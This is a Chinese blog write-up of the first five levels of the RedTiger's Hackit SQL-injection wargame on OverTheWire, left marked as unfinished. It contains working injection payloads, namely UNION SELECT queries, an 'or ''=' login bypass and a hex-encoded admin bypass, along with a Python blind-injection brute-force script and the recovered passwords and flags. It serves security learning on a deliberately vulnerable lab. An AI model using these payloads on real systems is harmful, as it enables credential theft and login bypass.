writeup--RedTiger's Hackit

最新推荐文章于 2024-08-08 20:05:56 发布

原创最新推荐文章于 2024-08-08 20:05:56 发布 · 4.2k 阅读

7 ·

CC 4.0 BY-SA版权

web安全专栏收录该内容

5 篇文章

订阅专栏

RedTiger’s Hackit

第一关

首先点进Category 1
网址后面跟了?cat=1，很明显是一个sql注入
看了下还给了表名。。Tablename: level1_users
构造了下
https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users

得到密码thatwaseasy

flag是27cbddc803ecde822d87a7e8639f9315

第二关

看见有登录框，应该也是sql注入
用万能用户密码’or ”=’试了下，成功注入

flag是1222e2d4ad5da677efb188550528bfaa

第三关

看到提示Get an error。。。弄了半天弄不出error，看了下别人的wp，改成?usr[1]=1得到error信息，
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 25

然后看了下urlcrypt.inc，有下面的代码，看来cow和admin后面的一大串都是加密过的，既然给了加密和解密的函数，直接写sql注入然后加密再传过去就可以了，话说它的加密方式还更新过。。这个如果要用的话要在linux下面加密，在windows下可能会乱码

<?php

    // warning! ugly code ahead :)

    function encrypt($str)
    {
        $cryptedstr = "";
        srand(3284724);
        for ($i =0; $i < strlen($str); $i++)
        {
            $temp = ord(substr($str,$i,1)) ^ rand(0, 255);

            while(strlen($temp)<3)
            {
                $temp = "0".$temp;
            }
            $cryptedstr .= $temp. "";
        }
        return base64_encode($cryptedstr);
    }

    function decrypt ($str)
    {
        srand(3284724);
        if(preg_match('%^[a-zA-Z0-9/+]*={0,2}$%',$str))
        {
            $str = base64_decode($str);
            if ($str != "" && $str != null && $str != false)
            {
                $decStr = "";

                for ($i=0; $i < strlen($str); $i+=3)
                {
                    $array[$i/3] = substr($str,$i,3);
                }

                foreach($array as $s)
                {
                    $a = $s ^ rand(0, 255);
                    $decStr .= chr($a);
                }

                return $decStr;
            }
            return false;
        }
        return false;
    }
?>

构造的明文为’ union select 1,password,2,3,4,5,6 from level3_users where username=’Admin
加密后得到
https://redtiger.labs.overthewire.org/level3.php?usr=MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDE3MjUyMDI1MTI2MTU2MTc2MTMzMDAwMjQ2MTU2MjA4MTgyMDk2MTI5MjIwMDQ5MDUyMjMwMTk4MTk2MTg5MTEzMDQxMjQwMTQ0MDM2MTQwMTY5MTcyMDgzMjQ0MDg3MTQxMTE1MDY2MTUzMjE0MDk1MDM4MTgxMTY1MDQ3MTE4MDg2MTQwMDM0MDg1MTE4MTE4MDk5MjIyMjE4MDEwMTkwMjIwMDcxMDQwMjIw

拿到flag：a707b245a60d570d25a0449c2a516eca

第四关

点了下click me，发现多了?id=1 很明显是可以注入，看了下主页的标题是盲注。。
先猜keyword有多长
http://redtiger.labs.overthewire.org/level4.php?id=1%20and%200%3C(select%20count(*)%20from%20level4_secret%20where%20length(keyword)=21)
发现长度为21，那写个python脚本来爆破一下

from urllib.request import *
import string
from re import *
char=string.printable
url="http://redtiger.labs.overthewire.org/level4.php?id=1%20and%201=(select%20count(*)%20from%20level4_secret%20where%20SUBSTR(keyword,{0},1)='{1}')"
login ={'Cookie':'level4login=there_is_no_bug'}
answer=""
for q in range(1,22):
    for i in char:
        test=(url .format(q,i))
        request=Request(test,None,headers=login)
        a=urlopen(request)
        s=a.read().decode()
        if(findall("Query returned 1 rows.",s)):
            print("{0}  ".format(q)+i)
            answer+=i
            break
print(answer)

得到keyword为 killstickswithbr1cks!

flag: e8bcb79c389f5e295bac81fda9fd7cfa

第五关

看到描述watch the login errors
然后输admin进去试下，然后输入框消失了，看来是过滤了admin
然后发现它也无视大小写，那直接用十六进制来绕过吧
根据提示密码要md5加密
构造出
’ union select 0x61646d696e as username, md5(123) as password #

flag为ca5c3c4f0bc85af1392aef35fc1d09b3

未完待续